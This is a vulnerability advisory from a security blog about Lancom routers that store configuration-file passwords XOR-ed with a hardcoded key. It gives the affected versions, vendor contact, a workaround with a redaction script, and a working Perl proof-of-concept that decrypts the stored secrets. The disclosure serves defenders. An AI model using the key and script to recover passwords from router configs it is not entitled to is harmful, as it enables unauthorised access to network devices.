WYAE.de - IT Security, KnowHow & Software

2019-11-19

Vulnerability Report: Lancom Router Weak Password Encryption (pre LCOS 9.x)

The encryption of passwords in router configuration files can trivially be broken.

Sorry for the late re-discovery - the issue was found and reported in 2009, but had been accidentally buried on my side, and was only rediscovered in late 2016.

Problem

The encryption of passwords in router configuration files can trivially be broken.

Systems affected

System tested: Lancom 1751 UMTS, LCOS 7.62.0042 (dated 05.03.2009)

LANCOM R883+ with Firmware 10.12.0442 (dated 20.07.2018)

Systems affected: all routers running LCOS before v9.x (confirmed by Lancom)

Explanation

When exporting the configuration into a text file, you can find the encrypted admin password in the section {Secrets} under the key 2.1 (in this demo case it is "dummy"):

{Secrets}
2.1 == 2f1b18091d

The secret is decrypted by simply XORing it byte-wise with the hardcoded string "Knuddelbaerchen" (which is German for "cuddly baby bear").

Fix

The affected LCOS versions pre-dating LCOS v9.x are no longer supported. Newer models / versions are supposedly not affected.

BUT

@sur5r reported that the bug is still valid on a LANCOM R883+ with Firmware 10.12.0442 (20.07.2018) and affects PPP and admin passwords.

Please update to a newer model and handle existing configuration files with care as advised in the manual's Security Checklist (and the "Workaround" section below).

Thank you to Lancom for quickly responding and resolving the issue (Support-ID 1609.2312.0000.KSCH).

Workaround

When exporting the config file, store it with the same protection you would give a file containing clear-text passwords - as advised in the manual.

When forwarding it to support, vendors or consultants please remove the {Secrets} section (especially the key 2.1).
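
One way to automate the removal step before a config export leaves your hands, as an added example (not part of the original report and not Lancom tooling). It assumes a section starts at a line of the form {Name} and runs until the next such line; redact_sections and the sample sections other than {Secrets} are hypothetical.

```python
import re

# Assumption: a section starts at a line consisting of "{Name}" and runs
# until the next such line; entries look like "2.1 == 2f1b18091d".
SECTION_RE = re.compile(r"^\s*\{([^{}]+)\}\s*$")
ENTRY_RE = re.compile(r"^\s*(\S+)\s*==")


def redact_sections(config_text, sections=("Secrets",)):
    """Return (sanitised_text, removed_keys) with the named sections dropped.

    removed_keys lists "Section/key" names only, never the values, so the
    report itself can be logged or shared.
    """
    drop = {name.lower() for name in sections}
    kept, removed = [], []
    current, dropping = None, False
    for line in config_text.splitlines():
        header = SECTION_RE.match(line)
        if header:
            current = header.group(1).strip()
            dropping = current.lower() in drop
            if dropping:
                continue  # drop the section header itself as well
        if dropping:
            entry = ENTRY_RE.match(line)
            if entry:
                removed.append(f"{current}/{entry.group(1)}")
            continue
        kept.append(line)
    return "\n".join(kept) + "\n", removed


# Constructed sample export: only {Secrets} and key 2.1 come from the report,
# the {Setup} and {Other} sections are made up for illustration.
SAMPLE = """{Setup}
1.1 == example-router
{Secrets}
2.1 == 2f1b18091d
{Other}
3.1 == value
"""

if __name__ == "__main__":
    clean, removed = redact_sections(SAMPLE)
    print(clean, end="")
    print("removed:", ", ".join(removed))
```

Keep the unredacted original under the same access controls as a clear-text password file, and send only the sanitised output.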

Proof of Concept

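#!/usr/bin/perl -w
#----------------------------------------------------------------------
#
# ./lancom-pw-decrypt.pl ....pw....

use strict;

# Hardcoded XOR key
my $key = "Knuddelbaerchen";

die "usage: $0 <hex-encoded secret>\n" unless @ARGV == 1;

# Convert the hex string from the config file into raw bytes
my $text = pack('H*', $ARGV[0]);

my $len = length($text);
# Number of key repetitions needed to cover the whole secret
my $xlen = int(length($text) / length($key)) + 1;

# Byte-wise XOR with the repeated key, then trim to the secret's length
my $result = $text ^ ($key x $xlen);
$result = substr($result, 0, $len);

print "$result\n";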


#----------------------------------------------------------------------
# 2009/2016       <volker.tanger@wyae.de>
# https://www.wyae.de/volker.tanger/vuln/lancom_password_knuddelbaerchen/